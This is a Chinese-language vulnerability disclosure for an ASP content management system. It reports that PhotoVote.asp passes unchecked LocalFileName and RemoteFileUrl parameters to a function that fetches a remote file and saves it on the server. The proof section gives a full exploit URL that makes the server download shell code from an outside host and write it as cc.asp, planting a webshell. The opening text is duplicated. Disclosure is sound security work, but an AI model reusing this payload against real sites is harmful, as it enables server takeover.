### 简要描述: 未对提交参数判断,导致可以写任意文件到服务器上... ### 详细说明: Wap/Plus/PhotoVote.asp 14 - 23 ``` Dim KS:Set KS=New PublicCls Dim ID:ID = Replace(KS.S("ID")," ","") Dim ChannelID:ChannelID=KS.G("ChannelID") If ChannelID="" Then ChannelID=2 If KS.G("LocalFileName")<>"" And KS.G("RemoteFileUrl")<>"" Then If KS.SaveBeyondFile(KS.G("LocalFileName"),KS.G("RemoteFileUrl"))= True Then Response.write KS.G("LocalFileName")'错误提示 End If End If 代码略…… '================================================== '过程名:SaveBeyondFile '作 用:保存远程的文件到本地 '参 数:LocalFileName ------ 本地文件名 '参 数:RemoteFileUrl ------ 远程文件URL '================================================== Function SaveBeyondFile(LocalFileName,RemoteFileUrl) On Error Resume Next SaveBeyondFile=True dim Ads,Retrieval,GetRemoteData Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", RemoteFileUrl, False, "", "" .Send If .Readystate<>4 then SaveBeyondFile=False Exit Function End If GetRemoteData = .ResponseBody End With Set Retrieval...
### 简要描述: 未对提交参数判断,导致可以写任意文件到服务器上... ### 详细说明: Wap/Plus/PhotoVote.asp 14 - 23 ``` Dim KS:Set KS=New PublicCls Dim ID:ID = Replace(KS.S("ID")," ","") Dim ChannelID:ChannelID=KS.G("ChannelID") If ChannelID="" Then ChannelID=2 If KS.G("LocalFileName")<>"" And KS.G("RemoteFileUrl")<>"" Then If KS.SaveBeyondFile(KS.G("LocalFileName"),KS.G("RemoteFileUrl"))= True Then Response.write KS.G("LocalFileName")'错误提示 End If End If 代码略…… '================================================== '过程名:SaveBeyondFile '作 用:保存远程的文件到本地 '参 数:LocalFileName ------ 本地文件名 '参 数:RemoteFileUrl ------ 远程文件URL '================================================== Function SaveBeyondFile(LocalFileName,RemoteFileUrl) On Error Resume Next SaveBeyondFile=True dim Ads,Retrieval,GetRemoteData Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", RemoteFileUrl, False, "", "" .Send If .Readystate<>4 then SaveBeyondFile=False Exit Function End If GetRemoteData = .ResponseBody End With Set Retrieval = Nothing Set Ads = Server.CreateObject("Adodb.Stream") With Ads .Type = 1 .Open .Write GetRemoteData .SaveToFile server.MapPath(LocalFileName),2 .Cancel() .Close() End With If Err.Number<>0 Then Err.Clear SaveBeyondFile=False Exit Function End If Set Ads=nothing End Function ``` 上面的代码中这几句: If KS.G("LocalFileName")<>"" And KS.G("RemoteFileUrl")<>"" Then If KS.SaveBeyondFile(KS.G("LocalFileName"),KS.G("RemoteFileUrl"))= True Then Response.write KS.G("LocalFileName")'错误提示 End If End If KS.G("LocalFileName")和KS.G("RemoteFileUrl")仅仅是判断是否为空并过滤一些SQL字符然后就写文件了! ### 漏洞证明: 登陆后访问: http://www.t00ls.net/Wap/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://www.bksec.net/1.txt 成功会在Wap/Plus下写入cc.asp,并返回文件名,其中的1.txt为shell代码。。
